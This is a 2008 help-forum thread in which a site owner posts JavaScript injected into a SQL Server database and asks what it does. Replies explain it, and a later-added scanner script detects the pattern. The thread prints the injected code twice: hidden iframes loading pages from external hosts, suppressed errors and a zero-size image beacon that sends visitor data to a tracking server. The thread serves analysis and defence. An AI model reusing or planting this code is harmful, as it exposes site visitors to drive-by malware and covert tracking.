Solved

sql injection js script, can someone tell me what this is doing?

Posted on 2008-06-09
Last Modified: 2008-06-10
Our SQL Server DB was infected with some sort of SQL injection - I downloaded the .js and it is as follows:

document.writeln("<iframe src=http:\/\/www.killpp.cn\/456.htm width=100 height=1><\/iframe>");

if (navigator.systemLanguage=='zh-cn')
{

}
else{
document.writeln("<iframe src=http:\/\/www.qiqicc.cn\/dj.htm width=100 height=0><\/iframe>");
}



window.onerror=function(){return true};
document.write ('<script>var a3327tf="51la";var a3327pu="";var a3327pf="51la";var a3327su=window.location;var a3327sf=document.referrer;var a3327of="";var a3327op="";var a3327ops=1;var a3327ot=1;var a3327d=new Date();var a3327color="";if (navigator.appName=="Netscape"){a3327color=screen.pixelDepth;} else {a3327color=screen.colorDepth;}<\/script><script>a3327tf=top.document.referrer;<\/script><script>a3327pu =window.parent.location;<\/script><script>a3327pf=window.parent.document.referrer;<\/script><script>a3327ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a3327ops=(a3327ops==null)?1: (parseInt(unescape((a3327ops)[2]))+1);var a3327oe =new Date();a3327oe.setTime(a3327oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a3327ops+ ";path=/;expires="+a3327oe.toGMTString();a3327ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a3327ot==null){a3327ot=1;}else{a3327ot=parseInt(unescape((a3327ot)[2])); a3327ot=(a3327ops==1)?(a3327ot+1):(a3327ot);}a3327oe.setTime(a3327oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a3327ot+";path=/;expires="+a3327oe.toGMTString();<\/script><script>a3327of=a3327sf;if(a3327pf!=="51la"){a3327of=a3327pf;}if(a3327tf!=="51la"){a3327of=a3327tf;}a3327op=a3327pu;try{lainframe}catch(e){a3327op=a3327su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=12&id=1933327&tpages=\'+a3327ops+\'&ttimes=\'+a3327ot+\'&tzone=\'+(0-a3327d.getTimezoneOffset()/60)+\'&tcolor=\'+a3327color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3327of)+\'&vpage=\'+escape(a3327op)+\'" \/>\');<\/script>');

Could someone tell me exactly what this is doing?

Thanks in advance.
Question by:samic400
LVL 6

Expert Comment

by:ysfx
ID: 21744909
Looks like code that sites use to track traffic from a different domain. My guess is that this is an attempt to circumvent sites that publish user inputs like blogs and feedback.
LVL 3

Accepted Solution

by:
NizzeK earned 2000 total points
ID: 21748375
You are not alone with this problem:
http://www.daniweb.com/forums/post614041.html
This is a Chinese attempt to gather information for malicious use.
See: http://www.sudosecure.net/archives/83

The code checks your pages and creates cookies (AJSTAT_ok_pages/AJSTAT_ok_times) with time stamp and availability information. Then it is printed in the guise of a utility, sending the collected information and identity to the data collector at web.51.la.
The code itself is not harmful, but it could reveal something unwanted.
I have reformatted the code to make the structure easier to see.

Best regards
Nils


document.writeln("<iframe src=http:\/\/www.killpp.cn\/456.htm width=100 height=1><\/iframe>");
 
if (navigator.systemLanguage=='zh-cn')
{
 
}
else{
document.writeln("<iframe src=http:\/\/www.qiqicc.cn\/dj.htm width=100 height=0><\/iframe>");
}
 
window.onerror=function(){return true};
document.write ('
	<script>
		var a3327tf="51la";
		var a3327pu="";
		var a3327pf="51la";
		var a3327su=window.location;
		var a3327sf=document.referrer;
		var a3327of="";
		var a3327op="";
		var a3327ops=1;
		var a3327ot=1;
		var a3327d=new Date();
		var a3327color="";
		if (navigator.appName=="Netscape")
			     {a3327color=screen.pixelDepth;} 
			else {a3327color=screen.colorDepth;}
	<\/script>
	<script>
		a3327tf=top.document.referrer;
	<\/script>
	<script>
		a3327pu =window.parent.location;
	<\/script>
	<script>
		a3327pf=window.parent.document.referrer;
	<\/script>
	<script>
		a3327ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));
		a3327ops=(a3327ops==null)?1:(parseInt(unescape((a3327ops)[2]))+1);
		var a3327oe =new Date();
		a3327oe.setTime(a3327oe.getTime()+60*60*1000);
		document.cookie="AJSTAT_ok_pages="+a3327ops+ ";
			path=/;
			expires="+a3327oe.toGMTString();
		a3327ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));
		if (a3327ot==null)
			     {a3327ot=1;}
			else {a3327ot=parseInt(unescape((a3327ot)[2])); a3327ot=(a3327ops==1)?(a3327ot+1):(a3327ot);}
		a3327oe.setTime(a3327oe.getTime()+365*24*60*60*1000);
		document.cookie="AJSTAT_ok_times="+a3327ot+";
			path=/;
			expires="+a3327oe.toGMTString();
	<\/script>
	<script>
		a3327of=a3327sf;
		if (a3327pf!=="51la")
			     {a3327of=a3327pf;}
		if(a3327tf!=="51la")
			     {a3327of=a3327tf;}
		a3327op=a3327pu;
		try{lainframe}catch(e){a3327op=a3327su;}
		document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=12&id=1933327&tpages=\'
			+a3327ops+\'&ttimes=\'+a3327ot+\'&tzone=\'+(0-a3327d.getTimezoneOffset()/60)+\'&tcolor=\'+a3327color+\'&sSize=\'
			+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3327of)+\'&vpage=\'+escape(a3327op)+\'" \/>\');
	<\/script>');

LVL 3

Expert Comment

by:NizzeK
ID: 21748394
But to start with, it gets page 456.htm, and that one has the malicious 4562.swf, see more:
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080527?logdate=200808
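
Added example, not part of the original posts: a small Node.js scanner that flags the pattern discussed in this thread, namely iframes or images that load from an external host while sized to 0 or 1 pixel, including when the markup is wrapped in document.write with escaped slashes. The sample input, the `.example` hosts and the function names are constructed for illustration.

```javascript
// Constructed sample: two hidden external embeds, two legitimate tags.
const SAMPLE = String.raw`
document.writeln("<iframe src=http:\/\/tracker.example\/a.htm width=100 height=1><\/iframe>");
document.write('<img style="width:0px;height:0px" src="http://stats.example/go.asp?id=1" \/>');
<iframe src="https://video.example/embed/1" width="560" height="315"></iframe>
<img src="/logo.png" width="120" height="40">
`;

// Read an attribute whose value is double-quoted, single-quoted or bare.
function attr(tag, name) {
  const re = new RegExp("\\b" + name + "\\s*=\\s*(?:\"([^\"]*)\"|'([^']*)'|([^\\s>]+))", "i");
  const m = tag.match(re);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// Pixel size from inline CSS if present, otherwise from the HTML attribute.
function dimension(tag, name) {
  const style = attr(tag, "style") || "";
  const css = style.match(new RegExp("(?:^|;)\\s*" + name + "\\s*:\\s*(\\d+)", "i"));
  const raw = css ? css[1] : attr(tag, name);
  return raw === null ? null : parseInt(raw, 10);
}

// Return every iframe/img that is effectively invisible AND points off-site.
// Relative URLs (same origin) are deliberately not reported.
function findHiddenEmbeds(text) {
  const clean = text.replace(/\\\//g, "/"); // undo JS-escaped slashes (\/)
  const findings = [];
  for (const m of clean.matchAll(/<(iframe|img)\b[^>]*>/gi)) {
    const tag = m[0];
    const width = dimension(tag, "width");
    const height = dimension(tag, "height");
    const hidden = (width !== null && width <= 1) || (height !== null && height <= 1);
    const src = attr(tag, "src") || "";
    const host = (src.match(/^(?:https?:)?\/\/([^\/?#"'\s]+)/i) || [])[1];
    if (hidden && host) findings.push({ tag: m[1].toLowerCase(), host, width, height });
  }
  return findings;
}

console.log(findHiddenEmbeds(SAMPLE));
```

Run it over exported text columns or served pages; any hit on a host you do not recognise marks a row or file to clean and an input path to review.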